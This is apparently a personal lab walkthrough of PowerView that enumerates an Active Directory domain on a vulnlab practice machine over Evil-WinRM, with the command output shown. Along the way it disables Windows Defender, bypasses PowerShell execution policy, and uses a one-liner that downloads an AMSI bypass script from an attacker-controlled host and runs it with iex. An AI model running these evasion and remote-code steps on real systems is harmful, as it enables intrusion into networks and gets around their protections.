powerview

PowerView Walkthrough

PowerView.ps1 can be found here

PowerView.ps1 can be downloaded here

Documentation

Official Documentation

For more functions, check out:

darkoperator/Veil-PowerView

Some Awesome Cheat Sheets

HarmJ0y’s

Hacktricks

HarmJ0y also has a good article on using some of PowerView’s interesting functionality.

Blog

Personal notes

In the demo’s below, i used  Delegate VM from vulnlab

I logged in with win-rm as admistrator and disabled Windows Defender ! 

*Evil-WinRM* PS C:\windows\tasks> Set-MpPreference -DisableRealtimeMonitoring $true

 

I have then downloaded PowerView in one of my Windows 10 PC’s for practice Purposes.

First, you need to fireup your command prompt and type:

powershell.exe -nop -exec bypass

You then need to import the PowerView module as follows:

Import-Module [full path to powerview.ps1]

image

Alternatively, You could run:

powershell -ep bypass

Followed by:

. .\PowerView.ps1

image

From here we can start enumerating😉

We can get information about the domain as follows:

Get-NetDomain

*Evil-WinRM* PS C:\windows\tasks> Get-NetDomain

Forest                  : delegate.vl
DomainControllers       : {DC1.delegate.vl}
Children                : {}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  :
PdcRoleOwner            : DC1.delegate.vl
RidRoleOwner            : DC1.delegate.vl
InfrastructureRoleOwner : DC1.delegate.vl
Name                    : delegate.vl

 

 

Getting information about DC’s [ you must be an Administrator to view this ]

AGAIN 1st disable AMSI !

*Evil-WinRM* PS C:\windows\tasks> whoami
delegate\administrator
*Evil-WinRM* PS C:\windows\tasks> (new-object system.net.webclient).downloadstring("http://10.8.2.138:8000/AMSIBypassPatch.ps1")|iex
Protection Disabled
*Evil-WinRM* PS C:\windows\tasks> import-module .\PowerView.ps1
*Evil-WinRM* PS C:\windows\tasks> 

some below commands give error ( no clue… )

*Evil-WinRM* PS C:\windows\tasks> Get-NetDomainControllers
The term 'Get-NetDomainControllers' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

 

To query domain policies

Get-DomainPolicy

*Evil-WinRM* PS C:\windows\tasks> Get-DomainPolicy


Unicode        : @{Unicode=yes}
SystemAccess   : @{MinimumPasswordAge=1; MaximumPasswordAge=42; MinimumPasswordLength=7; PasswordComplexity=1; PasswordHistorySize=24; LockoutBadCount=0; RequireLogonToChangePassword=0; ForceLogoffWhenHourExpire=0; ClearTextPassword=0;
                 LSAAnonymousNameLookup=0}
KerberosPolicy : @{MaxTicketAge=10; MaxRenewAge=7; MaxServiceAge=600; MaxClockSkew=5; TicketValidateClient=1}
RegistryValues : @{MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=System.Object[]}
Version        : @{signature="$CHICAGO$"; Revision=1}
Path           : \\delegate.vl\sysvol\delegate.vl\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf
GPOName        : {31B2F340-016D-11D2-945F-00C04FB984F9}
GPODisplayName : Default Domain Policy

 

* From ActiveDirectory Powershell Module 

*Evil-WinRM* PS C:\windows\tasks> Get-ADDefaultDomainPasswordPolicy


ComplexityEnabled           : True
DistinguishedName           : DC=delegate,DC=vl
LockoutDuration             : 00:30:00
LockoutObservationWindow    : 00:30:00
LockoutThreshold            : 0
MaxPasswordAge              : 42.00:00:00
MinPasswordAge              : 1.00:00:00
MinPasswordLength           : 7
objectClass                 : {domainDNS}
objectGuid                  : b74fec45-7fd8-4db4-b82c-86e2727310ea
PasswordHistoryCount        : 24
ReversibleEncryptionEnabled : False

.

 

If we wanted to enumerate Users:

Get-NetUser

*Evil-WinRM* PS C:\windows\tasks> Get-NetUser


logoncount             : 575
badpasswordtime        : 9/26/2023 2:28:11 AM
description            : Built-in account for administering the computer/domain
distinguishedname      : CN=Administrator,CN=Users,DC=delegate,DC=vl
objectclass            : {top, person, organizationalPerson, user}
lastlogontimestamp     : 11/21/2024 11:31:42 PM
name                   : Administrator
objectsid              : S-1-5-21-1484473093-3449528695-2030935120-500
samaccountname         : Administrator
logonhours             : {255, 255, 255, 255...}
admincount             : 1
codepage               : 0
samaccounttype         : USER_OBJECT
accountexpires         : 12/31/1600 4:00:00 PM
countrycode            : 0
whenchanged            : 11/22/2024 7:31:42 AM
instancetype           : 4
objectguid             : b27dc933-9a1f-4f1f-8d0d-07b1efdd6ae7
lastlogon              : 10/12/2023 3:05:06 AM
lastlogoff             : 12/31/1600 4:00:00 PM
objectcategory         : CN=Person,CN=Schema,CN=Configuration,DC=delegate,DC=vl
dscorepropagationdata  : {8/26/2023 9:55:18 AM, 8/26/2023 9:55:18 AM, 8/26/2023 9:40:08 AM, 1/1/1601 6:12:16 PM}
memberof               : {CN=Group Policy Creator Owners,CN=Users,DC=delegate,DC=vl, CN=Domain Admins,CN=Users,DC=delegate,DC=vl, CN=Enterprise Admins,CN=Users,DC=delegate,DC=vl, CN=Schema Admins,CN=Users,DC=delegate,DC=vl...}
whencreated            : 8/26/2023 9:39:30 AM
iscriticalsystemobject : True
badpwdcount            : 0
cn                     : Administrator
useraccountcontrol     : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
usncreated             : 8196
primarygroupid         : 513
pwdlastset             : 8/26/2023 8:46:29 AM
usnchanged             : 127024


 

The above command spits a ton of information for all users. Assuming you are enumerating an organization with many users, this can generate a whole bunch of information. We can filter all users though by running:

Get-NetUser | select cn

or

Get-NetUser | select samaccountname

*Evil-WinRM* PS C:\windows\tasks> Get-NetUser | select cn

cn
--
Administrator
Guest
krbtgt
A.Briggs
b.Brown
R.Cooper
J.Roberts
N.Thompson

 

If we want to get all the groups a user is a member of

Get-DomainGroup -MemberIdentity username | select cn

or

Get-DomainGroup -MemberIdentity username | select samaccountname

*Evil-WinRM* PS C:\windows\tasks> Get-DomainGroup -MemberIdentity b.brown | select cn

cn
--
Domain Users



 

If you wanted to check if the current user context has local administrator access

Invoke-CheckLocalAdminAccess

*Evil-WinRM* PS C:\windows\tasks> whoami
delegate\administrator
*Evil-WinRM* PS C:\windows\tasks> Invoke-CheckLocalAdminAccess

ComputerName IsAdmin
------------ -------
localhost       True

 

If you wanted to check if the current user has administrative access to the local (or a remote) machine

Test-AdminAccess

*Evil-WinRM* PS C:\windows\tasks> Test-AdminAccess

ComputerName IsAdmin
------------ -------
localhost       True

 

Lazy admins can leave behind some juicy details on the description. We can pull descriptions only by running:

Get-NetUser | select description

image

.

*Evil-WinRM* PS C:\windows\tasks> Get-NetUser b.brown | select description

description
-----------


*Evil-WinRM* PS C:\windows\tasks> 

 

f we want to get all the groups a user is a member of

Get-DomainGroup -MemberIdentity username | select cn

or

Get-DomainGroup -MemberIdentity username | select samaccountname

 

*Evil-WinRM* PS C:\windows\tasks> Get-DomainGroup -MemberIdentity j.roberts | select cn

cn
--
Domain Users
delegation admins

 

To get all the effective members of a group:

Get-DomainGroupMember -Identity "Domain Admins" -Recurse

 

*Evil-WinRM* PS C:\windows\tasks> Get-DomainGroupMember -Identity "Domain Admins" -Recurse

GroupDomain             : delegate.vl
GroupName               : Domain Admins
GroupDistinguishedName  : CN=Domain Admins,CN=Users,DC=delegate,DC=vl
MemberDomain            : delegate.vl
MemberName              : Administrator
MemberDistinguishedName : CN=Administrator,CN=Users,DC=delegate,DC=vl
MemberObjectClass       : user
MemberSID               : S-1-5-21-1484473093-3449528695-2030935120-500

 

Get Information about all computers:

Get-NetComputer

*Evil-WinRM* PS C:\windows\tasks> Get-NetComputer


pwdlastset                    : 11/26/2024 10:55:07 PM
logoncount                    : 164
msds-generationid             : {46, 251, 32, 236...}
serverreferencebl             : CN=DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=delegate,DC=vl
badpasswordtime               : 12/31/1600 4:00:00 PM
msds-additionaldnshostname    : dc1.debugger.vl
distinguishedname             : CN=DC1,OU=Domain Controllers,DC=delegate,DC=vl
objectclass                   : {top, person, organizationalPerson, user...}
displayname                   : DC1$
lastlogontimestamp            : 11/26/2024 10:55:04 PM
name                          : DC1
primarygroupid                : 516
objectsid                     : S-1-5-21-1484473093-3449528695-2030935120-1000
samaccountname                : DC1$
localpolicyflags              : 0
codepage                      : 0
samaccounttype                : MACHINE_ACCOUNT
whenchanged                   : 11/27/2024 6:55:28 AM
accountexpires                : NEVER
cn                            : DC1
operatingsystem               : Windows Server 2022 Standard
instancetype                  : 4
msdfsr-computerreferencebl    : CN=DC1,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=delegate,DC=vl
objectguid                    : 3dc17337-6dde-4562-8fc7-50cdd3a94def
operatingsystemversion        : 10.0 (20348)
lastlogoff                    : 12/31/1600 4:00:00 PM
objectcategory                : CN=Computer,CN=Schema,CN=Configuration,DC=delegate,DC=vl
dscorepropagationdata         : {8/26/2023 9:40:08 AM, 1/1/1601 12:00:01 AM}
serviceprincipalname          : {Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC1.delegate.vl, TERMSRV/DC1, TERMSRV/DC1.delegate.vl, ldap/DC1.delegate.vl/DELEGATE...}
usncreated                    : 12293
lastlogon                     : 11/26/2024 10:55:34 PM
badpwdcount                   : 0
msds-additionalsamaccountname : DC1
useraccountcontrol            : SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
whencreated                   : 8/26/2023 9:40:08 AM
countrycode                   : 0
iscriticalsystemobject        : True
msds-supportedencryptiontypes : 28
usnchanged                    : 127030
ridsetreferences              : CN=RID Set,CN=DC1,OU=Domain Controllers,DC=delegate,DC=vl
dnshostname                   : DC1.delegate.vl

.

Enumerating what operating systems are used on the domain

Get-NetComputer | select operatingsystem

*Evil-WinRM* PS C:\windows\tasks> Get-NetComputer | select operatingsystem

operatingsystem
---------------
Windows Server 2022 Standard

.

Enumerating groups

Get-NetGroup This spits a ton of information

*Evil-WinRM* PS C:\windows\tasks> Get-NetGroup > output.txt

grouptype              : CREATED_BY_SYSTEM, DOMAIN_LOCAL_SCOPE, SECURITY
admincount             : 1
iscriticalsystemobject : True
samaccounttype         : ALIAS_OBJECT
samaccountname         : Administrators
whenchanged            : 8/26/2023 9:55:18 AM
objectsid              : S-1-5-32-544
objectclass            : {top, group}
cn                     : Administrators
usnchanged             : 12772
systemflags            : -1946157056
name                   : Administrators
dscorepropagationdata  : {8/26/2023 9:55:18 AM, 8/26/2023 9:40:08 AM, 1/1/1601 12:04:16 AM}
description            : Administrators have complete and unrestricted access to the computer/domain
distinguishedname      : CN=Administrators,CN=Builtin,DC=delegate,DC=vl
member                 : {CN=Domain Admins,CN=Users,DC=delegate,DC=vl, CN=Enterprise Admins,CN=Users,DC=delegate,DC=v
l, CN=Administrator,CN=Users,DC=delegate,DC=vl}
usncreated             : 8199
whencreated            : 8/26/2023 9:39:30 AM
instancetype           : 4
objectguid             : 35c4abd9-945a-4fec-818a-b9ffa0a88c09
objectcategory         : CN=Group,CN=Schema,CN=Configuration,DC=delegate,DC=vl

grouptype              : CREATED_BY_SYSTEM, DOMAIN_LOCAL_SCOPE, SECURITY
Description            : Users are prevented from making accidental or intentional system-wide changes and can run mo
member                 : {CN=Domain Users,CN=Users,DC=delegate,DC=vl, CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=del
etc.etc

 

We can summarise all the information above by running

Get-NetGroup | select name

*Evil-WinRM* PS C:\windows\tasks> Get-NetGroup | select name

name
----
Administrators
Users
Guests
Print Operators
Backup Operators
Replicator
Remote Desktop Users
Network Configuration Operators
Performance Monitor Users
Performance Log Users
Distributed COM Users
IIS_IUSRS
Cryptographic Operators
Event Log Readers
Certificate Service DCOM Access
RDS Remote Access Servers
RDS Endpoint Servers
RDS Management Servers
Hyper-V Administrators
Access Control Assistance Operators
Remote Management Users
Storage Replica Administrators
Domain Computers
Domain Controllers
Schema Admins
Enterprise Admins
Cert Publishers
Domain Admins
Domain Users
Domain Guests
Group Policy Creator Owners
RAS and IAS Servers
Server Operators
Account Operators
Pre-Windows 2000 Compatible Access
Incoming Forest Trust Builders
Windows Authorization Access Group
Terminal Server License Servers
Allowed RODC Password Replication Group
Denied RODC Password Replication Group
Read-only Domain Controllers
Enterprise Read-only Domain Controllers
Cloneable Domain Controllers
Protected Users
Key Admins
Enterprise Key Admins
DnsAdmins
DnsUpdateProxy
delegation admins

 

To locate shares on hosts in the local domain

Invoke-ShareFinder

*Evil-WinRM* PS C:\windows\tasks> Invoke-ShareFinder

Name           Type Remark              ComputerName
----           ---- ------              ------------
ADMIN$   2147483648 Remote Admin        DC1.delegate.vl
C$       2147483648 Default share       DC1.delegate.vl
IPC$     2147483651 Remote IPC          DC1.delegate.vl
NETLOGON          0 Logon server share  DC1.delegate.vl
SYSVOL            0 Logon server share  DC1.delegate.vl

 

To pull Group Policy Objects (GPO’s)

Get-NetGPO This spits a ton of information

*Evil-WinRM* PS C:\windows\tasks> Get-NetGPO


usncreated               : 5672
systemflags              : -1946157056
displayname              : Default Domain Policy
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00
                           C04FB94F17}]
whenchanged              : 9/9/2023 2:10:32 PM
objectclass              : {top, container, groupPolicyContainer}
gpcfunctionalityversion  : 2
showinadvancedviewonly   : True
usnchanged               : 69785
dscorepropagationdata    : {8/26/2023 9:40:08 AM, 1/1/1601 12:00:00 AM}
name                     : {31B2F340-016D-11D2-945F-00C04FB984F9}
flags                    : 0
cn                       : {31B2F340-016D-11D2-945F-00C04FB984F9}
iscriticalsystemobject   : True
gpcfilesyspath           : \\delegate.vl\sysvol\delegate.vl\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
distinguishedname        : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=delegate,DC=vl
whencreated              : 8/26/2023 9:39:29 AM
versionnumber            : 9
instancetype             : 4
objectguid               : 3b9a44f2-0449-4fa2-87f6-d7255d9613f4
objectcategory           : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=delegate,DC=vl

usncreated               : 5675
systemflags              : -1946157056
displayname              : Default Domain Controllers Policy
gpcmachineextensionnames : [{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged              : 9/9/2023 2:10:32 PM
objectclass              : {top, container, groupPolicyContainer}
gpcfunctionalityversion  : 2
showinadvancedviewonly   : True
usnchanged               : 69787
dscorepropagationdata    : {8/26/2023 9:40:08 AM, 1/1/1601 12:00:00 AM}
name                     : {6AC1786C-016F-11D2-945F-00C04fB984F9}
flags                    : 0
cn                       : {6AC1786C-016F-11D2-945F-00C04fB984F9}
iscriticalsystemobject   : True
gpcfilesyspath           : \\delegate.vl\sysvol\delegate.vl\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
distinguishedname        : CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=delegate,DC=vl
whencreated              : 8/26/2023 9:39:29 AM
versionnumber            : 8
instancetype             : 4
objectguid               : 108e9cde-591e-4f3f-a3b4-d51b9ac0dd55
objectcategory           : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=delegate,DC=vl

 

We can narrow it down by selecting specific attributes. For example

Get-NetGPO | select displayname, whenchanged, whencreated

*Evil-WinRM* PS C:\windows\tasks> Get-NetGPO | select displayname, whenchanged, whencreated

displayname                       whenchanged         whencreated
-----------                       -----------         -----------
Default Domain Policy             9/9/2023 2:10:32 PM 8/26/2023 9:39:29 AM
Default Domain Controllers Policy 9/9/2023 2:10:32 PM 8/26/2023 9:39:29 AM

 

If you have any questions, don’t ask